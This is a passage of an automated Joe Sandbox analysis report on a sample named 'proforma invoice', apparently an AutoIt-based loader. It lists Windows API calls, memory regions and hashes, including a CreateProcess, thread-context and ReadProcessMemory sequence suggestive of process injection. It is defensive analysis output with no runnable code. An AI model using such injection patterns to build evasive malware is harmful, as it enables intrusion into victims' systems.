                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00B12CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B13006
                  • CloseHandle.KERNEL32(00000000,?,00B12CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B1300D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: File$CloseCreateHandleTime
                  • String ID:
                  • API String ID: 3397143404-0
                  APIs
                  • __Init_thread_footer.LIBCMT ref: 00AB17F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Init_thread_footer
                  • String ID: CALL
                  • API String ID: 1385522511-4196123274
                  APIs
                  • _wcslen.LIBCMT ref: 00B16F6B
                    • Part of subcall function 00AA4ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4EFD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: LibraryLoad_wcslen
                  • String ID: >>>AUTOIT SCRIPT<<<
                  • API String ID: 3312870042-2806939583
                  APIs
                  • GetOpenFileNameW.COMDLG32(?), ref: 00AE2C8C
                    • Part of subcall function 00AA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA3A97,?,?,00AA2E7F,?,?,?,00000000), ref: 00AA3AC2
                    • Part of subcall function 00AA2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AA2DC4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Name$Path$FileFullLongOpen
                  • String ID: X
                  • API String ID: 779396738-3081909835
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: __fread_nolock
                  • String ID: EA06
                  • API String ID: 2638373210-3962188686
                  APIs
                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AA3908
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: IconNotifyShell_
                  • String ID:
                  • API String ID: 1144537725-0
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,00ABCF58,?,?,?), ref: 00AA6DBA
                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00ABCF58,?,?,?), ref: 00AA6DED
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide
                  • String ID:
                  • API String ID: 626452242-0
                  APIs
                  • __Init_thread_footer.LIBCMT ref: 00AABB4E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Init_thread_footer
                  • String ID:
                  • API String ID: 1385522511-0
                  APIs
                  • CreateProcessW.KERNELBASE(?,00000000), ref: 02101A5B
                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02101AF1
                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02101B13
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655323945.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2100000_proforma invoice.jbxd
                  Similarity
                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                  • String ID:
                  • API String ID: 2438371351-0
                  APIs
                    • Part of subcall function 00AA4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AA4EDD,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4E9C
                    • Part of subcall function 00AA4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AA4EAE
                    • Part of subcall function 00AA4E90: FreeLibrary.KERNEL32(00000000,?,?,00AA4EDD,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4EC0
                  • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4EFD
                    • Part of subcall function 00AA4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AE3CDE,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4E62
                    • Part of subcall function 00AA4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AA4E74
                    • Part of subcall function 00AA4E59: FreeLibrary.KERNEL32(00000000,?,?,00AE3CDE,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4E87
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Library$Load$AddressFreeProc
                  • String ID:
                  • API String ID: 2632591731-0
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: __wsopen_s
                  • String ID:
                  • API String ID: 3347428461-0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000,?,00B71444,?,00ABFDF5,?,?,00AAA976,00000010,00B71440,00AA13FC,?,00AA13C6,?,00AA1129), ref: 00AD3852
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  APIs
                  • FreeLibrary.KERNEL32(?,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4F6D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  APIs
                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AA2DC4
                    • Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: LongNamePath_wcslen
                  • String ID:
                  • API String ID: 541455249-0
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: __fread_nolock
                  • String ID:
                  • API String ID: 2638373210-0
                  APIs
                    • Part of subcall function 00AA3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AA3908
                    • Part of subcall function 00AAD730: GetInputState.USER32 ref: 00AAD807
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00AA2B6B
                    • Part of subcall function 00AA30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00AA314E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: IconNotifyShell_$CurrentDirectoryInputState
                  • String ID:
                  • API String ID: 3667716007-0
                  APIs
                  • CreateFileW.KERNELBASE(00000000,00000000,?,00AE0704,?,?,00000000,?,00AE0704,00000000,0000000C), ref: 00AE03B7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  APIs
                  • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00AA1CBC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: InfoParametersSystem
                  • String ID:
                  • API String ID: 3098949447-0
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  APIs
                  • Sleep.KERNELBASE(000001F4), ref: 021022B1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655323945.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2100000_proforma invoice.jbxd
                  Similarity
                  • API ID: Sleep
                  • String ID:
                  • API String ID: 3472027048-0
                  APIs
                  • Sleep.KERNELBASE(000001F4), ref: 021022B1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655323945.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2100000_proforma invoice.jbxd
                  Similarity
                  • API ID: Sleep
                  • String ID:
                  • API String ID: 3472027048-0
                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                  • Instruction ID: 42ec7e2db2a4cfccc4f1562f594a82c6175d67c6d38aabc1a6ddf7c51e89cbbe
                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                  • Instruction Fuzzy Hash: FFE0BF7498010E9FDB00EFE4D54969E7BB4EF04301F100161FD0592280D77099508A62
                  APIs
                    • Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2
                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00B3961A
                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B3965B
                  • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00B3969F
                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B396C9
                  • SendMessageW.USER32 ref: 00B396F2
                  • GetKeyState.USER32(00000011), ref: 00B3978B
                  • GetKeyState.USER32(00000009), ref: 00B39798
                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B397AE
                  • GetKeyState.USER32(00000010), ref: 00B397B8
                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B397E9
                  • SendMessageW.USER32 ref: 00B39810
                  • SendMessageW.USER32(?,00001030,?,00B37E95), ref: 00B39918
                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00B3992E
                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B39941
                  • SetCapture.USER32(?), ref: 00B3994A
                  • ClientToScreen.USER32(?,?), ref: 00B399AF
                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B399BC
                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B399D6
                  • ReleaseCapture.USER32 ref: 00B399E1
                  • GetCursorPos.USER32(?), ref: 00B39A19
                  • ScreenToClient.USER32(?,?), ref: 00B39A26
                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B39A80
                  • SendMessageW.USER32 ref: 00B39AAE
                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B39AEB
                  • SendMessageW.USER32 ref: 00B39B1A
                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B39B3B
                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B39B4A
                  • GetCursorPos.USER32(?), ref: 00B39B68
                  • ScreenToClient.USER32(?,?), ref: 00B39B75
                  • GetParent.USER32(?), ref: 00B39B93
                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B39BFA
                  • SendMessageW.USER32 ref: 00B39C2B
                  • ClientToScreen.USER32(?,?), ref: 00B39C84
                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B39CB4
                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B39CDE
                  • SendMessageW.USER32 ref: 00B39D01
                  • ClientToScreen.USER32(?,?), ref: 00B39D4E
                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B39D82
                    • Part of subcall function 00AB9944: GetWindowLongW.USER32(?,000000EB), ref: 00AB9952
                  • GetWindowLongW.USER32(?,000000F0), ref: 00B39E05
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                  • String ID: @GUI_DRAGID$F
                  • API String ID: 3429851547-4164748364
                  • Opcode ID: 80ee514ff5d2a293b78d44dedbe9e60dd3d409b32e255038066a14ea020d42d7
                  • Instruction ID: dbb477afe34253343f62d149f19634092739e28b03276c2ccfd383f34802b72d
                  • Opcode Fuzzy Hash: 80ee514ff5d2a293b78d44dedbe9e60dd3d409b32e255038066a14ea020d42d7
                  • Instruction Fuzzy Hash: DE42BF35205200AFD724CF68CC85EAABBE5FF49310F204A99F699972A1DBB1EC51CF51
                  APIs
                  • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00B348F3
                  • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00B34908
                  • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00B34927
                  • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00B3494B
                  • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00B3495C
                  • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00B3497B
                  • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00B349AE
                  • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00B349D4
                  • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00B34A0F
                  • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00B34A56
                  • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00B34A7E
                  • IsMenu.USER32(?), ref: 00B34A97
                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B34AF2
                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B34B20
                  • GetWindowLongW.USER32(?,000000F0), ref: 00B34B94
                  • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00B34BE3
                  • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00B34C82
                  • wsprintfW.USER32 ref: 00B34CAE
                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B34CC9
                  • GetWindowTextW.USER32(?,00000000,00000001), ref: 00B34CF1
                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B34D13
                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B34D33
                  • GetWindowTextW.USER32(?,00000000,00000001), ref: 00B34D5A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                  • String ID: %d/%02d/%02d
                  • API String ID: 4054740463-328681919
                  • Opcode ID: f09330c4996a93b82a5ae56edee7b61fe4b908241a474e50bcd90c8bdedf4b02
                  • Instruction ID: b5613af745f495406dfbcc245f6b6b8cd2850b58f0ff1dca3ee4133fbdaf599e
                  • Opcode Fuzzy Hash: f09330c4996a93b82a5ae56edee7b61fe4b908241a474e50bcd90c8bdedf4b02
                  • Instruction Fuzzy Hash: F912D271500214AFEB258F68CC4AFAE7BF8EF45710F2441A9F519EB2E1DB74A941CB50
                  APIs
                  • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00ABF998
                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AFF474
                  • IsIconic.USER32(00000000), ref: 00AFF47D
                  • ShowWindow.USER32(00000000,00000009), ref: 00AFF48A
                  • SetForegroundWindow.USER32(00000000), ref: 00AFF494
                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00AFF4AA
                  • GetCurrentThreadId.KERNEL32 ref: 00AFF4B1
                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00AFF4BD
                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 00AFF4CE
                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 00AFF4D6
                  • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00AFF4DE
                  • SetForegroundWindow.USER32(00000000), ref: 00AFF4E1
